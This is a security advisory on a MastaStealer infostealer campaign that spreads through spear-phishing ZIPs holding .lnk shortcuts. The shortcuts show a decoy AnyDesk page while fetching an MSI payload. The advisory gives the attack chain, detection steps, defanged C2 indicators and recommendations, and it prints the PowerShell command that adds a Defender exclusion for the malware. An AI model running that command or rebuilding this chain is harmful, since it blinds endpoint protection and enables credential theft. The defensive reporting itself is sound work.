Malicious LNK Campaign Deploys MastaStealer via MSI-Based Payloads
November 18th, 2025
High
Our Cyber Threat Intelligence Unit has identified a newly observed malware campaign that uses Windows shortcut (.lnk) files as the initial access vector to deploy MastaStealer, a sophisticated infostealer. The campaign targets Windows systems via spear-phishing emails that deliver ZIP archives containing a single crafted .lnk file. Once executed, the shortcut launches Microsoft Edge to display the legitimate AnyDesk website as a decoy, while silently downloading and installing an MSI-based payload from an AnyDesk-themed compromised domain (e.g., anydesck[.]net). The MSI installer deploys a command-and-control (C2) beacon masquerading as a legitimate Windows binary and uses PowerShell to add a Windows Defender exclusion for the malware’s path. Because this chain relies on native Windows features (LNK launch, MSI installer, Defender exclusion modification), it can evade default protections and allow persistent attacker access, posing a serious risk for organizations with Windows-based endpoints.
Technical Details
Attack Type: Infostealer deployment via malicious LNK files.
Severity: High.
Delivery Method: Spear-phishing emails delivering ZIP archives containing a single .lnk shortcut that executes hidden PowerShell commands to fetch and run an MSI-based payload.
Affected Components: Windows endpoints, especially Windows 10/11 systems, where users execute .lnk files from email attachments.
Attack Chain:
Victims receive spear-phishing emails containing ZIP attachments with a single malicious .lnk file masquerading as a legitimate document or tool.
When clicked, the LNK launches Microsoft Edge and opens the AnyDesk website (anydesk[.]com) in the foreground as a decoy, while a hidden PowerShell command executes in the background.
The PowerShell command downloads and runs an MSI installer from AnyDesk-spoofed or compromised domains such as anydesck[.]net / anydesk[.]net.
The MSI creates a temporary folder under %LOCALAPPDATA%\Temp\MW-<UUID>\files.cab, extracts its contents, and drops a binary named dwm.exe into %LOCALAPPDATA%\Microsoft\Windows.
This executable functions as the MastaStealer C2 beacon.
During installation, the malware runs a PowerShell command such as: Add-MpPreference -ExclusionPath "C:\Users\admin\AppData\Local\Microsoft\Windows\dvm.exe".
This adds a Windows Defender exclusion for the malware’s directory, effectively blinding Defender’s real-time scanning and allowing the beacon to operate undetected.
Once active, the beacon communicates with remote C2 infrastructure and exfiltrates stolen data, including credentials, browser cookies, and session tokens.
Impact
Theft of sensitive system information, credentials, cookies, and browser-stored data, allowing for account takeover and further compromise.
Potential compromise of accounts linked to saved passwords, tokens, or persistent browser sessions.
Loss of endpoint integrity due to stealthy installation under legitimate-looking Windows paths (%LOCALAPPDATA%\Microsoft\Windows\dwm.exe).
Reduced security monitoring effectiveness because the malware adds a Windows Defender exclusion for its path.
Potential lateral movement if harvested credentials grant access to internal systems or privileged accounts.
Increased risk of subsequent malware deployment via the attacker’s persistent foothold and C2 beacon.
Detection Method
Monitor execution of .lnk files, especially those launched from email attachment paths or temp directories, that spawn PowerShell or other unexpected child processes.
Correlate Windows Installer logs (Application Event ID 11708) with recent LNK/PowerShell activity to detect failed or suspicious MSI deployments associated with this campaign.
Detect MSI installations initiated from non-corporate, newly registered, or suspicious remote domains, including AnyDesk-themed compromised domains.
Hunt for new Windows Defender exclusion entries referencing %LOCALAPPDATA%\Microsoft\Windows or similarly unusual user-profile paths, especially those added via PowerShell Add-MpPreference.
Inspect process trees for dwm.exe running from user directories (e.g., %LOCALAPPDATA%\Microsoft\Windows) instead of C:\Windows\System32\.
Analyze network logs for connections to the known MastaStealer C2 domains and IPs listed in the IOC section, as well as unusual outbound traffic to newly observed AnyDesk-themed or random-looking domains.
During incident response, note whether an AnyDesk page in Edge appeared unexpectedly at the same time as suspicious script or MSI activity, as this decoy behavior is characteristic of the campaign.
Indicators of Compromise
Type | Indicator |
Domain Name | cmqsqomiwwksmcsw[.]xyz |
IP Address | 38[.]134[.]148[.]74 |
Domain Name | ykgmqooyusggyyya[.]xyz |
IP Address | 155[.]117[.]20[.]75 |
Recommendations
Block or restrict execution of .lnk files originating from email attachments, downloads, or untrusted network shares.
Enforce application allowlisting to ensure only trusted applications and signed installers can execute.
Enable and centralize advanced logging for PowerShell and Windows Installer to capture Add-MpPreference usage and MSI failures (Event ID 11708).
Monitor and alert on PowerShell commands that modify Defender preferences, especially those involving exclusion paths under %LOCALAPPDATA%\Microsoft\Windows or other non-standard directories.
Validate the legitimacy and file path of processes named like system binaries (e.g., dwm.exe) and investigate any instances running from user-profile locations instead of System32.
Implement robust email security controls (sandboxing, ZIP content inspection) to detect and block malicious LNK-laden attachments at the perimeter.
Proactively block or closely monitor access to the identified C2 infrastructure and AnyDesk-themed compromised domains involved in this campaign.
Conclusion
The MastaStealer campaign demonstrates a sophisticated abuse of native Windows features such as LNK shortcuts, MSI installers, and Defender exclusions, to bypass traditional security measures and quietly establish a persistent C2 beacon. We urge organizations to prioritize controls that monitor LNK-based execution, detect suspicious MSI deployments, and flag unauthorized security exclusions. Regularly updating security protocols, hardening endpoint configurations, and maintaining vigilant monitoring of script-based and installer activity are essential to mitigate risks associated with this and similar Windows-focused infostealer campaigns.